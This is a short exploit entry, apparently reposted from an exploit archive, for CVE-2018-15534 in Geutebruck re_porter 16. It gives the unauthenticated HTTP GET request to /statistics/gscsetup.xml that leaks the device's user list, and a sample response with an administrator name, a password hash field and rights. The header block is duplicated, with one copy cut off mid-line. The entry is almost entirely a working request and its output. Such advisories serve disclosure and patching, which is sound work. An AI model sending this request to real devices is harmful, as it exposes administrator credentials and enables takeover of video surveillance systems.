# Exploit Title: Geutebruck re_porter 16 Credentials Disclosure
# Date: 03-08-2018
# Exploit Author: Kamil Suska
# Vendor Homepage:
https://www.geutebrueck.com//media/_public/produ # Exploit Title: Geutebruck re_porter 16 Credentials Disclosure
# Date: 03-08-2018
# Exploit Author: Kamil Suska
# Vendor Homepage:
https://www.geutebrueck.com//media/_public/products/descriptions_archive/en/re_porter_econ_7.74007_IA_DE_EN_FR_ES.pdf
# Version: prior 7.8.974.20
# CVE-2018-15534
GET /statistics/gscsetup.xml HTTP/1.1
Host: example.com:12003
<Node Name="UserList" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
<Node Name="0000" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
<Value Name="Name" ValueType="ntWideString" Value="Sysadmin"/>
<Value Name="Password" ValueType="ntString"
Value="##MD5passwordhash##"/>
<Value Name="UserRights" ValueType="ntInt32" Value="0x00000001"/>
<Node Name="SecondUserList"
NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
</Node>
Pozdrawiam
Kamil Suska
Geutebruck re porter 16 Credential Disclosure
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 344